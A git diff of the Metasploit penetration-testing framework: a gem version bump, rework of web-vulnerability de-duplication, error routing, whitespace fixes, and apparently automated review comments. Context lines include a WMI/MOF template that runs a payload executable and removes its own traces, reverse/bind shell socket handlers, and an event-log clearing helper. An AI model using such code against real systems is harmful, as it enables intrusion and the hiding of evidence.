diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/db/schema.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/db/schema.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/db/schema.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/db/schema.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/lib/assets/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/lib/assets/.gitkeep
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/lib/assets/.gitkeep
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/lib/assets/.gitkeep
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/log/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/log/.gitkeep
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/log/.gitkeep
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/log/.gitkeep
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/404.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/public/404.html
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/404.html
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/public/404.html
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/422.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/public/422.html
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/422.html
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/public/422.html
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/500.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/public/500.html
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/500.html
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/public/500.html
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/favicon.ico b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/public/favicon.ico
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/favicon.ico
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/public/favicon.ico
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/script/rails
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/script/rails
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/script/rails
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/addresses.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/addresses.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/addresses.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/addresses.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/hosts.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/hosts.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/hosts.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/services.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/services.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/services.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/services.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/users.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/users.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/users.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/users.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_sites.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/web_sites.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_sites.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/web_sites.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/web_vulns.rb similarity index 92% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_vulns.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/web_vulns.rb index 4bba254c7b..308a52a98f 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_vulns.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/web_vulns.rb @@ -25,8 +25,8 @@ FactoryGirl.define do end sequence :mdm_web_vuln_confidence do |n| - # range is from 1 to 100 so do mod 99 (0 - 99 range) and add 1 to get correct range - (n % 99) + 1 + # range is from 0 to 100 + n % 101 end method_count = Mdm::WebVuln::METHODS.length 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/workspaces.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/workspaces.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/factories/mdm/workspaces.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/lib/base64_serializer_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/lib/base64_serializer_spec.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/lib/base64_serializer_spec.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/lib/base64_serializer_spec.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/spec_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/spec_helper.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/spec_helper.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/spec_helper.rb
diff --git a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.6.0.gemspec b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.6.2.gemspec
similarity index 97%
rename from lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.6.0.gemspec
rename to lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.6.2.gemspec
index 4a19d34025..ae4c2d7b8f 100644
--- a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.6.0.gemspec
+++ b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.6.2.gemspec
@@ -2,11 +2,11 @@ Gem::Specification.new do |s| s.name = "metasploit_data_models" - s.version = "0.6.0" + s.version = "0.6.2" s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= s.authors = ["Trevor Rosen"] - s.date = "2013-03-06" + s.date = "2013-03-08" s.description = "Implements minimal ActiveRecord models and database helper code used in both the Metasploit Framework (MSF) and Metasploit commercial editions." s.email = ["trevor_rosen@rapid7.com"] s.executables = ["mdm_console"] diff --git a/lib/msf/base/config.rb b/lib/msf/base/config.rb index 2d8c98acba..60f50f4a45 100644 --- a/lib/msf/base/config.rb +++ b/lib/msf/base/config.rb @@ -88,7 +88,7 @@ class Config < Hash def self.module_directory self.new.module_directory end - + # # Calls the instance method. # @@ -144,7 +144,7 @@ class Config < Hash def self.user_module_directory self.new.user_module_directory end - + # # Calls the instance method. # @@ -235,7 +235,7 @@ class Config < Hash def module_directory install_root + FileSep + self['ModuleDirectory'] end - + # # Returns the path that scripts can be loaded from. # @@ -284,7 +284,7 @@ class Config < Hash def user_module_directory config_directory + FileSep + "modules" end - + # # Returns the user-specific plugin base path # diff --git a/lib/msf/base/simple/auxiliary.rb b/lib/msf/base/simple/auxiliary.rb index 1eada62e93..ed9d7dafbb 100644 --- a/lib/msf/base/simple/auxiliary.rb +++ b/lib/msf/base/simple/auxiliary.rb @@ -77,7 +77,7 @@ module Auxiliary Proc.new { |ctx_| self.job_cleanup_proc(ctx_) } ) # Propagate this back to the caller for console mgmt - omod.job_id = mod.job_id + omod.job_id = mod.job_id else self.job_run_proc(ctx) self.job_cleanup_proc(ctx) diff --git a/lib/msf/base/simple/framework.rb b/lib/msf/base/simple/framework.rb index c92153ab71..c8ac7ab49a 100644 --- a/lib/msf/base/simple/framework.rb +++ b/lib/msf/base/simple/framework.rb 
@@ -167,7 +167,7 @@ module Framework if (Msf::Config.module_directory) self.modules.add_module_path(Msf::Config.module_directory) end - + # Initialize the user module search path if (Msf::Config.user_module_directory) self.modules.add_module_path(Msf::Config.user_module_directory) diff --git a/lib/msf/core.rb b/lib/msf/core.rb index 5cbaf19efa..21516099e7 100644 --- a/lib/msf/core.rb +++ b/lib/msf/core.rb @@ -41,7 +41,7 @@ require 'msf/core/session' require 'msf/core/session_manager' - + # Wrappers require 'msf/core/encoded_payload' diff --git a/lib/msf/core/auxiliary/web.rb b/lib/msf/core/auxiliary/web.rb index 3c83af5f9a..dd234103e4 100644 --- a/lib/msf/core/auxiliary/web.rb +++ b/lib/msf/core/auxiliary/web.rb @@ -160,8 +160,8 @@ module Auxiliary::Web vhash = [target.to_url, opts[:fingerprint], mode, opts[:location]]. map { |x| x.to_s }.join( '|' ).hash - return if parent.vulns.include?( vhash ) - parent.vulns[vhash] = true + parent.vulns[mode] ||= {} + return if parent.vulns[mode].include?( vhash ) location = opts[:location] ? page.url.merge( URI( opts[:location].to_s )) : page.url @@ -183,6 +183,7 @@ module Auxiliary::Web } info[:confidence] = calculate_confidence( info ) + parent.vulns[mode][vhash] = info report_web_vuln( info ) @@ -195,8 +196,8 @@ module Auxiliary::Web vhash = [target.to_url, mode, opts[:location]]. map { |x| x.to_s }.join( '|' ).hash - return if parent.vulns.include?( vhash ) - parent.vulns[vhash] = true + parent.vulns[mode] ||= {} + return if parent.vulns[mode].include?( vhash ) location = URI( opts[:location].to_s ) info = { @@ -216,6 +217,7 @@ module Auxiliary::Web } info[:confidence] = calculate_confidence( info ) + parent.vulns[mode][vhash] = info report_web_vuln( info ) @@ -237,7 +239,7 @@ module Auxiliary::Web :params => element.params.to_a, :mode => mode, :pname => element.altered, - :proof => proof, + :proof => proof.to_s, :form => element.model, :risk => details[:risk], :name => details[:name], 
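Review bot: The shape of `parent.vulns` changes in the `lib/msf/core/auxiliary/web.rb` hunks at -160 and -183 (and again at -195 and -216) from a flat `{ vhash => true }` set to `{ mode => { vhash => info } }`, and nothing in the new code documents it. Any other reader that still tests `parent.vulns.include?( vhash )` at the top level would silently stop matching and could report duplicates; those callers are outside the hunks, so this is worth a grep before merging. The entry is also written only after `calculate_confidence( info )`, where the old code marked the hash before building `info`, so an exception raised in between (for instance from `URI( opts[:location].to_s )` on a malformed location) leaves the finding unmarked. I would add a comment above the guard, `# parent.vulns is { mode => { vhash => info } }; the stored info is the finding as reported`, and state in it why the full `info` hash rather than `true` is kept. The enclosing methods start and end outside the hunks.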
@@ -266,7 +268,7 @@ module Auxiliary::Web :method => element.method.to_s.upcase, :params => element.params.to_a, :pname => element.altered, - :proof => proof, + :proof => proof.to_s, :risk => details[:risk], :name => details[:name], :blame => details[:blame], diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index 166370abbc..789c8233c8 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -67,6 +67,7 @@ class Auxiliary::Web::HTTP attr_reader :opts attr_reader :headers attr_reader :framework + attr_reader :parent attr_accessor :redirect_limit attr_accessor :username , :password @@ -75,6 +76,7 @@ class Auxiliary::Web::HTTP @opts = opts.dup @framework = opts[:framework] + @parent = opts[:parent] @headers = { 'Accept' => '*/*', @@ -130,8 +132,8 @@ class Auxiliary::Web::HTTP begin request.handle_response request( request.url, request.opts ) rescue => e - elog e.to_s - e.backtrace.each { |l| elog l } + print_error e.to_s + e.backtrace.each { |l| print_error l } end end end @@ -250,6 +252,11 @@ class Auxiliary::Web::HTTP private + def print_error( message ) + return if !@parent + @parent.print_error message + end + def call_after_run_blocks while block = @after_run_blocks.pop block.call diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index 38b48c644e..73c38d73e9 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -288,7 +288,7 @@ class ModuleDataStore < DataStore val = super if val.nil? val end - + # # Was this entry actually set or just using its default # diff --git a/lib/msf/core/db_export.rb b/lib/msf/core/db_export.rb index 8eafe84ac4..effa7ff813 100644 --- a/lib/msf/core/db_export.rb +++ b/lib/msf/core/db_export.rb 
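Review bot: The new private `print_error` in the last `lib/msf/core/auxiliary/web/http.rb` hunk returns silently when `@parent` is nil, so an exception caught by the `rescue => e` in the -130 hunk is now discarded entirely for any HTTP object built without `opts[:parent]`, where it previously reached the framework log through `elog`. Keeping the log as the fallback preserves the record needed to diagnose a failed or incomplete scan: `return elog( message ) if !@parent`. The backtrace is also printed line by line to the operator's output; sending the backtrace to `elog` and printing only `e.to_s` would keep the console readable while retaining the detail. The class body continues outside these hunks.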
@@ -376,17 +376,17 @@ class Export d.attributes.each_pair do |k,v| el = create_xml_element(k,v) report_file.write(" #{el}\n") - end + end end report_file.write(" \n") - + # Refs sub-elements report_file.write(" \n") m.refs.find(:all).each do |d| d.attributes.each_pair do |k,v| el = create_xml_element(k,v) report_file.write(" #{el}\n") - end + end end report_file.write(" \n") @@ -397,7 +397,7 @@ class Export d.attributes.each_pair do |k,v| el = create_xml_element(k,v) report_file.write(" #{el}\n") - end + end end report_file.write(" \n") @@ -408,7 +408,7 @@ class Export d.attributes.each_pair do |k,v| el = create_xml_element(k,v) report_file.write(" #{el}\n") - end + end end report_file.write(" \n") @@ -419,7 +419,7 @@ class Export d.attributes.each_pair do |k,v| el = create_xml_element(k,v) report_file.write(" #{el}\n") - end + end end report_file.write(" \n") @@ -429,7 +429,7 @@ class Export d.attributes.each_pair do |k,v| el = create_xml_element(k,v) report_file.write(" #{el}\n") - end + end end report_file.write(" \n") @@ -439,7 +439,7 @@ class Export d.attributes.each_pair do |k,v| el = create_xml_element(k,v) report_file.write(" #{el}\n") - end + end end report_file.write(" \n") @@ -468,7 +468,7 @@ class Export el = create_xml_element(k,v) report_file.write(" #{el}\n") end - report_file.write(" \n") + report_file.write(" \n") end report_file.write(" \n") @@ -479,7 +479,7 @@ class Export d.attributes.each_pair do |k,v| el = create_xml_element(k,v) report_file.write(" #{el}\n") - end + end report_file.write(" \n") end report_file.write(" \n") @@ -516,7 +516,7 @@ class Export el = create_xml_element(k,v) report_file.write(" #{el}\n") end - + # References report_file.write(" \n") e.refs.each do |ref| @@ -534,7 +534,7 @@ class Export el = create_xml_element(k,v) report_file.write(" #{el}\n") end - report_file.write(" \n") + report_file.write(" \n") end report_file.write(" \n") 
@@ -547,7 +547,7 @@ class Export el = create_xml_element(k,v) report_file.write(" #{el}\n") end - report_file.write(" \n") + report_file.write(" \n") end report_file.write(" \n") diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 726eb682f7..5a916ef389 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -485,14 +485,14 @@ class DBManager m.targets.each_index do |i| bits << [ :target, { :index => i, :name => m.targets[i].name.to_s } ] - if m.targets[i].platform + if m.targets[i].platform m.targets[i].platform.platforms.each do |name| - bits << [ :platform, { :name => name.to_s.split('::').last.downcase } ] - end - end + bits << [ :platform, { :name => name.to_s.split('::').last.downcase } ] + end + end if m.targets[i].arch bits << [ :arch, { :name => m.targets[i].arch.to_s } ] - end + end end if (m.default_target) diff --git a/lib/msf/core/encoded_payload.rb b/lib/msf/core/encoded_payload.rb index d5c481e7ce..2cdf6a66a1 100755 --- a/lib/msf/core/encoded_payload.rb +++ b/lib/msf/core/encoded_payload.rb @@ -147,7 +147,7 @@ class EncodedPayload 'core', LEV_1) next end - + # Import the datastore from payload (and likely exploit by proxy) self.encoder.share_datastore(pinst.datastore) @@ -276,7 +276,7 @@ class EncodedPayload nops.each { |nopname, nopmod| # Create an instance of the nop module self.nop = nopmod.new - + # Propagate options from the payload and possibly exploit self.nop.share_datastore(pinst.datastore) diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb index 6d2afc913d..e059d0999b 100644 --- a/lib/msf/core/exploit.rb +++ b/lib/msf/core/exploit.rb @@ -32,7 +32,7 @@ class Exploit < Msf::Module ## - # Exceptions + # Exceptions ## # Indicate that the exploit should abort because it has completed @@ -1292,7 +1292,7 @@ class Exploit < Msf::Module ## # Failure tracking ## - + def fail_with(reason,msg=nil) self.fail_reason = reason self.fail_detail = msg 
diff --git a/lib/msf/core/exploit/capture.rb b/lib/msf/core/exploit/capture.rb index dc12ddcb92..51fde88437 100644 --- a/lib/msf/core/exploit/capture.rb +++ b/lib/msf/core/exploit/capture.rb @@ -100,11 +100,11 @@ module Exploit::Capture self.capture = ::Pcap.open_offline(cap) else dev ||= ::Pcap.lookupdev - + unless RUBY_PLATFORM == "i386-mingw32" system("ifconfig", dev, "up") end - + self.capture = ::Pcap.open_live(dev, len, true, tim) if arp self.arp_capture = ::Pcap.open_live(dev, 512, true, tim) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 8cb75c490a..b8bdf3ca59 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -184,8 +184,8 @@ module Exploit::Remote::HttpServer uopts = { 'Proc' => Proc.new { |cli, req| self.cli = cli - ( self.respond_to?(:filter_request_uri) && - filter_request_uri(cli, req) + ( self.respond_to?(:filter_request_uri) && + filter_request_uri(cli, req) ) ? nil : on_request_uri(cli, req) }, 'Path' => resource_uri diff --git a/lib/msf/core/exploit/mssql_sqli.rb b/lib/msf/core/exploit/mssql_sqli.rb index 400dba11cc..62ec63fa22 100644 --- a/lib/msf/core/exploit/mssql_sqli.rb +++ b/lib/msf/core/exploit/mssql_sqli.rb @@ -137,7 +137,7 @@ module Exploit::Remote::MSSQL_SQLI # Issue a SQL query using the the SQL injection point # def mssql_query(sqla, doprint=false) - + if (doprint) print_status(sqla) end diff --git a/lib/msf/core/exploit/wbemexec.rb b/lib/msf/core/exploit/wbemexec.rb index 1961b8c1f3..660d29f45d 100644 --- a/lib/msf/core/exploit/wbemexec.rb +++ b/lib/msf/core/exploit/wbemexec.rb 
@@ -52,7 +52,7 @@ Instance of ActiveScriptEventConsumer as $cons Name = "ASEC"; ScriptingEngine = "JScript"; ScriptText = "\\ntry {var s = new ActiveXObject(\\"Wscript.Shell\\");\\ns.Run(\\"@EXE@\\");} catch (err) {};\\nsv = GetObject(\\"winmgmts:root\\\\\\\\cimv2\\");try {sv.Delete(\\"MyClass@CLASS@\\");} catch (err) {};try {sv.Delete(\\"__EventFilter.Name='instfilt'\\");} catch (err) {};try {sv.Delete(\\"ActiveScriptEventConsumer.Name='ASEC'\\");} catch(err) {};"; - + }; Instance of ActiveScriptEventConsumer as $cons2 { @@ -64,14 +64,14 @@ instance of __EventFilter as $Filt { Name = "instfilt"; Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \\"MyClass@CLASS@\\""; - QueryLanguage = "WQL"; + QueryLanguage = "WQL"; }; instance of __EventFilter as $Filt2 { Name = "qndfilt"; Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \\"Win32_Process\\" AND TargetInstance.Name = \\"@EXE@\\""; QueryLanguage = "WQL"; - + }; instance of __FilterToConsumerBinding as $bind { diff --git a/lib/msf/core/exploit_driver.rb b/lib/msf/core/exploit_driver.rb index 6cb179e64b..be5be42b0e 100644 --- a/lib/msf/core/exploit_driver.rb +++ b/lib/msf/core/exploit_driver.rb @@ -204,7 +204,7 @@ protected # Launch the exploit exploit.exploit - + rescue ::Exception => e @@ -217,7 +217,7 @@ protected msg = "#{e}" unless e.class == Msf::Exploit::Failed msg = "#{e.class} #{e}" - end + end exploit.error = e @@ -231,7 +231,7 @@ protected when Msf::Exploit::Failed exploit.print_error("Exploit aborted due to failure: #{exploit.fail_reason}: #{msg}") - + # The caller should have already set exploit.fail_reason if exploit.fail_reason == Msf::Exploit::Failure::None exploit.fail_reason = Msf::Exploit::Failure::Unknown 
@@ -249,7 +249,7 @@ protected elog("Exploit failed (#{exploit.refname}): #{msg}", 'core', LEV_0) dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3) else - + # Compare as a string since not all error classes may be loaded case msg when /access.denied|Login Failed/i # Covers SMB as well as some generic errors diff --git a/lib/msf/core/framework.rb b/lib/msf/core/framework.rb index 99050a6cb5..941dcad94d 100644 --- a/lib/msf/core/framework.rb +++ b/lib/msf/core/framework.rb @@ -301,7 +301,7 @@ class FrameworkEventSubscriber # def session_event(name, session, opts={}) address = session.session_host - + if not (address and address.length > 0) elog("Session with no session_host/target_host/tunnel_peer") dlog("#{session.inspect}", LEV_3) diff --git a/lib/msf/core/handler/bind_tcp.rb b/lib/msf/core/handler/bind_tcp.rb index 297276288c..ba47410988 100644 --- a/lib/msf/core/handler/bind_tcp.rb +++ b/lib/msf/core/handler/bind_tcp.rb @@ -161,15 +161,15 @@ module BindTcp if datastore["PAYLOAD"] !~ /java\// or (datastore["AESPassword"] || "") == "" return sock end - + socks = Rex::Socket::tcp_socket_pair() socks[0].extend(Rex::Socket::Tcp) socks[1].extend(Rex::Socket::Tcp) - + m = OpenSSL::Digest::Digest.new('md5') m.reset key = m.digest(datastore["AESPassword"] || "") - + Rex::ThreadFactory.spawn('AESEncryption', false) { c1 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8') c1.encrypt @@ -183,7 +183,7 @@ module BindTcp end sock.close() } - + Rex::ThreadFactory.spawn('AESEncryption', false) { c2 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8') c2.decrypt @@ -200,7 +200,7 @@ module BindTcp end socks[0].close() } - + return socks[1] end diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb index 086a1b4b28..353d111af0 100644 --- a/lib/msf/core/handler/reverse_tcp.rb +++ b/lib/msf/core/handler/reverse_tcp.rb 
@@ -171,20 +171,20 @@ module ReverseTcp } end - + def wrap_aes_socket(sock) if datastore["PAYLOAD"] !~ /java\// or (datastore["AESPassword"] || "") == "" return sock end - + socks = Rex::Socket::tcp_socket_pair() socks[0].extend(Rex::Socket::Tcp) socks[1].extend(Rex::Socket::Tcp) - + m = OpenSSL::Digest::Digest.new('md5') m.reset key = m.digest(datastore["AESPassword"] || "") - + Rex::ThreadFactory.spawn('AESEncryption', false) { c1 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8') c1.encrypt diff --git a/lib/msf/core/module.rb b/lib/msf/core/module.rb index 40581a6e32..a62a8c12be 100644 --- a/lib/msf/core/module.rb +++ b/lib/msf/core/module.rb @@ -391,7 +391,7 @@ class Module nil end - + # # Returns the current workspace # @@ -617,7 +617,7 @@ class Module def debugging? (datastore['DEBUG'] || '') =~ /^(1|t|y)/i end - + # # Indicates whether the module supports IPv6. This is true by default, # but certain modules require additional work to be compatible or are diff --git a/lib/msf/core/patches/active_record.rb b/lib/msf/core/patches/active_record.rb index 6e8fa74070..9376b81e59 100644 --- a/lib/msf/core/patches/active_record.rb +++ b/lib/msf/core/patches/active_record.rb @@ -7,7 +7,7 @@ class ConnectionPool # XXX: This fixes the logic around whether a connection allocated is "fresh" # AR incorrectly assumed that if any connection was established, it should # no longer free the allocated connection. - + # Check to see if there is an active thread connection def active_thread_connection?(with_id = current_connection_id) @reserved_connections.has_key?(with_id) @@ -77,12 +77,12 @@ class ConnectionPool raise ConnectionTimeoutError, "could not obtain a database connection#{" within #{@timeout} seconds" if @timeout}. The max pool size is currently #{@size}; consider increasing it or the wait_timeout parameter" end end - end + end end - end - - - + end + + + end end end diff --git a/lib/msf/core/post/common.rb b/lib/msf/core/post/common.rb index 3a763f6c4d..f923b29ee0 100644 
--- a/lib/msf/core/post/common.rb +++ b/lib/msf/core/post/common.rb @@ -81,7 +81,7 @@ module Common end # - # Reports to the database that the host is a virtual machine and reports + # Reports to the database that the host is a virtual machine and reports # the type of virtual machine it is (e.g VirtualBox, VMware, Xen) # def report_vm(vm) diff --git a/lib/msf/core/post/windows/cli_parse.rb b/lib/msf/core/post/windows/cli_parse.rb index 108086ef73..419d2e3e81 100644 --- a/lib/msf/core/post/windows/cli_parse.rb +++ b/lib/msf/core/post/windows/cli_parse.rb @@ -14,7 +14,7 @@ module CliParse class ParseError < ArgumentError # - # Create a new ParseError object. Expects a method name, an error + # Create a new ParseError object. Expects a method name, an error # message, an error code, and the command that caused the error. # def initialize(method, einfo='', ecode=nil, clicmd=nil) diff --git a/lib/msf/core/post/windows/eventlog.rb b/lib/msf/core/post/windows/eventlog.rb index 6bbf0bc7e7..60c734fea1 100644 --- a/lib/msf/core/post/windows/eventlog.rb +++ b/lib/msf/core/post/windows/eventlog.rb @@ -20,7 +20,7 @@ module Eventlog end # - # Clears a given eventlog or all eventlogs if none is given. Returns an array of eventlogs + # Clears a given eventlog or all eventlogs if none is given. Returns an array of eventlogs # that where cleared. # def eventlog_clear(evt = "") diff --git a/lib/msf/core/post/windows/powershell.rb b/lib/msf/core/post/windows/powershell.rb index 38b3909543..405b35e8f6 100644 --- a/lib/msf/core/post/windows/powershell.rb +++ b/lib/msf/core/post/windows/powershell.rb 
@@ -131,8 +131,8 @@ module Powershell # - # Powershell scripts that are longer than 8000 bytes are split into 8000 - # 8000 byte chunks and stored as environment variables. A new powershell + # Powershell scripts that are longer than 8000 bytes are split into 8000 + # 8000 byte chunks and stored as environment variables. A new powershell # script is built that will reassemble the chunks and execute the script. # Returns the reassembly script. # diff --git a/lib/msf/core/post/windows/registry.rb b/lib/msf/core/post/windows/registry.rb index bb77e8c9b2..c3f0af50dc 100644 --- a/lib/msf/core/post/windows/registry.rb +++ b/lib/msf/core/post/windows/registry.rb @@ -323,7 +323,7 @@ protected end # - # Enumerate the type and data stored in the registry value +valname+ in + # Enumerate the type and data stored in the registry value +valname+ in # +key+ # def shell_registry_getvalinfo(key, valname) diff --git a/lib/msf/core/post/windows/shadowcopy.rb b/lib/msf/core/post/windows/shadowcopy.rb index cfa76ec087..e5e1e5215f 100644 --- a/lib/msf/core/post/windows/shadowcopy.rb +++ b/lib/msf/core/post/windows/shadowcopy.rb @@ -13,7 +13,7 @@ module ShadowCopy include Msf::Post::Windows::Services # - # Get the device name for the shadow copy, which is used when accessing + # Get the device name for the shadow copy, which is used when accessing # files on the volume. # def get_vss_device(id) @@ -44,7 +44,7 @@ module ShadowCopy # # Get volume shadow storage parameters. - # + # def vss_get_storage storage={} storage['AllocatedSpace'] = vss_get_storage_param('AllocatedSpace') @@ -84,7 +84,7 @@ module ShadowCopy end # - # Return the value of the +param_name+ for the volume shadow copy + # Return the value of the +param_name+ for the volume shadow copy # specified by +id+ # def get_sc_param(id,param_name) 
